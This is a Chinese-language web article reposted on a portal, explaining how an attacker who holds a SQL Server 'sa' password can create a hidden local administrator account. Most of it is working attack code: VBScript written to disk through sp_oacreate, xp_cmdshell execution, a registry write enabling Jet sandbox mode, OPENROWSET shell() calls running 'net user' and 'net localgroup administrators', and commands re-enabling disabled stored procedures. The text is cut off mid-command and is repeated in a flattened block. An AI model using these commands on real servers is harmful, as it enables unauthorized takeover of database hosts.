| 導購 | 订阅 | 在线投稿
分享
 
 
當前位置: 王朝網路 >> mssql >> Microsoft SQL Server SA權限最新入侵方法
 

Microsoft SQL Server SA權限最新入侵方法

2008-07-30 06:50:46  編輯來源:互聯網  简体版  手機版  評論  字體: ||
 
 
  在獲得SA密碼後,往往因爲服務器管理者或」前人」將net.exe和net1.exe被限制使用,無法添加管理員賬號。我們知道VBS在活動目錄(ADSI)部分有一個winnt對象,用來管理本地資源,利用它可以不依靠CMD等命令就能添加一個管理員,具體代碼如下:

  set wsnetwork=CreateObject("WSCRIPT.NETWORK")

  os="WinNT://"&wsnetwork.ComputerName

  Set ob=GetObject(os) '得到adsi接口,綁定

  Set oe=GetObject(os&"/Administrators,group") '屬性,admin組

  Set od=ob.Create("user","test") '建立用戶

  od.SetPassword "1234" '設置密碼

  od.SetInfo '保存

  Set of=GetObject(os&"/test",user) '得到用戶

  oe.add os&"/test"

  將上面的代碼保存爲1.vbs,然後執行,命令爲「cscript 1.vbs」,這樣就會在系統添加一個系統名爲test,密碼爲1234的用戶。具體在查詢分析器執行的代碼如下:

  declare @o int, @f int, @t int, @ret int

  exec sp_oacreate 'scripting.filesystemobject', @o out

  exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1

  exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject

  ("WSCRIPT.NETWORK")'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.

  ComputerName'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject

  (os&"/Administrators,group")'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create

  ("user","test")'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'

  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '

  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject

  (os&"/test",user) '

  exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

  執行完上面的語句,再執行下面這行代碼,這行代碼一定單獨執行,不要與上面的放在一起執行,否則會提示「c:\1.vbs正被另一個程序運行」而無法成功添加用戶:

  exec master..xp_cmdshell 'cscript c:\1.vbs'

  如果系統用戶沒有添加成功,有可能是因爲系統用戶的密碼1234的太簡單,不符合服務器的複雜密碼策略,可以考慮設置的複雜些,然後再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式爲:

  exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")

  >>1.vbs'

  不過,不知道爲什麽所有帶「&」字符的命令行都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。

  使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關動態鏈接庫帶來的煩惱。出于安全原因,系統默認情況下沙盤模式未開啓,這就需要xp_regwrite開啓沙盤模式:

  Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0

  \Engines','SandBoxMode','REG_DWORD',1

  然後執行沙盤命令,在系統添加一個用戶名爲test,密碼爲1234的用戶:

  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows

  \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows

  \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup

  administrators test /add")')

  不同的操作系統,路徑也不一樣,需要根據情況做修改:

  NT/2K: c:\winnt\system32\

  XP/2003: c:\windows\system32\

  另外Microsoft SQL Server2005在默認情況下,一些存儲過程是關閉著的,需要命令打開:

  開啓XP_cmdshell:

  EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure

  'xp_cmdshell', 1;RECONFIGURE;

  開啓'OPENROWSET':

  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure

  'Ad Hoc Distributed Queries',1;RECONFIGURE;

  開啓'sp_oacreate':

  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp
 
 
 
上一篇《修改SQL Server 2005 sa用戶密碼的方法》
下一篇《SQL Server數據庫sa密碼相關問題的解決方法》
 
 
 
日版寵物情人插曲《Winding Road》歌詞

日版寵物情人2017的插曲,很帶節奏感,日語的,女生唱的。 最後聽見是在第8集的時候女主手割傷了,然後男主用嘴幫她吸了一下,插曲就出來了。 歌手:Def...

兄弟共妻,我成了他們夜裏的美食

老鍾家的兩個兒子很特別,就是跟其他的人不太一樣,魔一般的執著。兄弟倆都到了要結婚的年齡了,不管自家老爹怎麽磨破嘴皮子,兄弟倆說不娶就不娶,老父母爲兄弟兩操碎了心...

如何磨出破洞牛仔褲?牛仔褲怎麽剪破洞?

把牛仔褲磨出有線的破洞 1、具體工具就是磨腳石,下面墊一個硬物,然後用磨腳石一直磨一直磨,到把那塊磨薄了,用手撕開就好了。出來的洞啊很自然的。需要貓須的話調幾...

我就是掃描下圖得到了敬業福和愛國福

先來看下敬業福和愛國福 今年春節,支付寶再次推出了“五福紅包”活動,表示要“把欠大家的敬業福都還給大家”。 今天該活動正式啓動,和去年一樣,需要收集“五福”...

冰箱異味産生的原因和臭味去除的方法

有時候我們打開冰箱就會聞到一股異味,冰箱裏的這種異味是因爲一些物質發出的氣味的混合體,聞起來讓人惡心。 産生這些異味的主要原因有以下幾點。 1、很多人有這種習...

《極品家丁》1-31集大結局分集劇情介紹

簡介 《極品家丁》講述了現代白領林晚榮無意回到古代金陵,並追隨蕭二小姐化名“林三”進入蕭府,不料卻陰差陽錯上演了一出低級家丁拼搏上位的“林三升職記”。...

李溪芮《極品家丁》片尾曲《你就是我最愛的寶寶》歌詞

你就是我最愛的寶寶 - 李溪芮 (電視劇《極品家丁》片尾曲) 作詞:常馨內 作曲:常馨內 你的眉 又鬼馬的挑 你的嘴 又壞壞的笑 上一秒吵鬧 下...

烏梅的功效與作用以及烏梅的食用禁忌有哪些?

烏梅,又稱春梅,中醫認爲,烏梅味酸,性溫,無毒,具有安心、除熱、下氣、祛痰、止渴調中、殺蟲的功效,治肢體痛、肺痨病。烏梅泡水喝能治傷寒煩熱、止吐瀉,與幹姜一起制...

什麽是脂肪粒?如何消除臉部脂肪粒?

什麽是脂肪粒 在我們的臉上總會長一個個像脂肪的小顆粒,弄也弄不掉,而且顔色還是白白的。它既不是粉刺也不是其他的任何痘痘,它就是脂肪粒。 脂肪粒雖然也是由油脂...

網絡安全治理:國家安全保障的主要方向是打擊犯罪,而不是處置和懲罰受害者

來源:中國青年報 新的攻擊方法不斷湧現,黑客幾乎永遠占據網絡攻擊的上風,我們不可能通過技術手段杜絕網絡攻擊。國家安全保障的主要方向是打擊犯罪,而不是處置和懲罰...

 
 
 
在獲得SA密碼後,往往因爲服務器管理者或」前人」將net.exe和net1.exe被限制使用,無法添加管理員賬號。我們知道VBS在活動目錄(ADSI)部分有一個winnt對象,用來管理本地資源,利用它可以不依靠CMD等命令就能添加一個管理員,具體代碼如下: set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) '得到adsi接口,綁定 Set oe=GetObject(os&"/Administrators,group") '屬性,admin組 Set od=ob.Create("user","test") '建立用戶 od.SetPassword "1234" '設置密碼 od.SetInfo '保存 Set of=GetObject(os&"/test",user) '得到用戶 oe.add os&"/test" 將上面的代碼保存爲1.vbs,然後執行,命令爲「cscript 1.vbs」,這樣就會在系統添加一個系統名爲test,密碼爲1234的用戶。具體在查詢分析器執行的代碼如下: declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject ("WSCRIPT.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject (os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create ("user","test")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject (os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"' 執行完上面的語句,再執行下面這行代碼,這行代碼一定單獨執行,不要與上面的放在一起執行,否則會提示「c:\1.vbs正被另一個程序運行」而無法成功添加用戶: exec master..xp_cmdshell 'cscript c:\1.vbs' 如果系統用戶沒有添加成功,有可能是因爲系統用戶的密碼1234的太簡單,不符合服務器的複雜密碼策略,可以考慮設置的複雜些,然後再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式爲: exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK") >>1.vbs' 不過,不知道爲什麽所有帶「&」字符的命令行都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。 使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關動態鏈接庫帶來的煩惱。出于安全原因,系統默認情況下沙盤模式未開啓,這就需要xp_regwrite開啓沙盤模式: Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0 \Engines','SandBoxMode','REG_DWORD',1 然後執行沙盤命令,在系統添加一個用戶名爲test,密碼爲1234的用戶: select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")') 不同的操作系統,路徑也不一樣,需要根據情況做修改: NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\ 另外Microsoft SQL Server2005在默認情況下,一些存儲過程是關閉著的,需要命令打開: 開啓XP_cmdshell: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 開啓'OPENROWSET': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 開啓'sp_oacreate': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp
󰈣󰈤
 
 
 
  免責聲明:本文僅代表作者個人觀點,與王朝網路無關。王朝網路登載此文出於傳遞更多信息之目的,並不意味著贊同其觀點或證實其描述,其原創性以及文中陳述文字和內容未經本站證實,對本文以及其中全部或者部分內容、文字的真實性、完整性、及時性本站不作任何保證或承諾,請讀者僅作參考,並請自行核實相關內容。
 
 
微光夜曲_朦胧的美
青春校園_女生娜娜
氣質佳人_唯美動人
新年時尚魅力女生
痞子的甘南日記
疑是銀河落九天
雪域壩上四——純美色
冬日戀歌——西城楊柳弄輕柔
 
>>返回首頁<<
 
 熱帖排行
 
 
 
 
© 2005- 王朝網路 版權所有